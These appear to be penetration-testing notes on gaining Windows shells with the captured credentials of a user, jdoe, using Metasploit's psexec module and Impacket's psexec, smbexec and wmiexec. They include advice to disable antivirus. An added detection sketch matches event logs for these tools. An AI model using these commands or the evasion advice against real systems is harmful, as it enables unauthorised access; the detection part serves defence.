Context

Previously we found the credentials for the user jdoe. Now we’re going to use them to gain a shell on a machine.

PsExec is noisy and tends to trigger antivirus, so start with smbexec or wmiexec. Also try using the half shell to disable the antivirus, then switch to a more robust shell.

PSEXEC

msfconsole
use exploit/windows/smb/psexec # a PowerShell variant also exists: "psexec_psh"
options # set options
show targets # set the target if automatic targeting doesn't work
run # may need to be run several times

PSEXEC.py

psexec.py SEED.local/jdoe:<password>@<target>

SMBexec.py

smbexec.py SEED.local/jdoe:<password>@<target>

WMIexec.py

wmiexec.py SEED.local/jdoe:<password>@<target>
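
Why "noisy" is relative: all three tools leave host artifacts a defender can match. The following is an added detection sketch, not part of the original notes, that classifies constructed service-install (System event 7045) and Sysmon process-creation (event 1) records. The dict field names, sample events and regexes are assumptions modelled on default Impacket command lines, which vary by version.

```python
import re

# Heuristics modelled on default Impacket command lines (assumptions; they vary by version).
PSEXEC_SVC = re.compile(r"^%systemroot%\\[A-Za-z]{8}\.exe$", re.I)
SMBEXEC_SVC = re.compile(r"%COMSPEC%\s+/Q\s+/c\s+echo\s.*\^>\s*\\\\[^\\\s]+\\", re.I)
WMIEXEC_CMD = re.compile(r"cmd\.exe\s+/Q\s+/c\s.*\s1>\s*\\\\[^\\\s]+\\ADMIN\$\\__\d", re.I)

def classify(event):
    """Label one normalised event dict, or return None when nothing matches."""
    if event.get("event_id") == 7045:      # System log: a service was installed
        path = event.get("image_path", "")
        if PSEXEC_SVC.search(path):
            return "psexec-like service binary"
        if SMBEXEC_SVC.search(path):
            return "smbexec-like service command"
    elif event.get("event_id") == 1:       # Sysmon: process creation
        parent = event.get("parent_image", "").lower()
        if parent.endswith("wmiprvse.exe") and WMIEXEC_CMD.search(event.get("command_line", "")):
            return "wmiexec-like child process"
    return None

def triage(events):
    """Return (host, label) for every event that matches a heuristic."""
    hits = []
    for event in events:
        label = classify(event)
        if label:
            hits.append((event["host"], label))
    return hits

# Constructed sample events, not taken from a real host.
SAMPLE_EVENTS = [
    {"host": "WS01", "event_id": 7045, "image_path": r"%systemroot%\QzLmPwRt.exe"},
    {"host": "WS02", "event_id": 7045,
     "image_path": r"%COMSPEC% /Q /c echo whoami ^> \\127.0.0.1\C$\__output 2^>^&1 "
                   r"> %TEMP%\execute.bat & %COMSPEC% /Q /c %TEMP%\execute.bat"},
    {"host": "WS03", "event_id": 1,
     "parent_image": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "command_line": r"cmd.exe /Q /c whoami 1> \\127.0.0.1\ADMIN$\__1700000000.12 2>&1"},
    {"host": "WS04", "event_id": 7045,   # benign service for contrast
     "image_path": r'"C:\Program Files\Vendor\Agent\agent.exe" /svc'},
]

if __name__ == "__main__":
    for host, label in triage(SAMPLE_EVENTS):
        print(host, label)
```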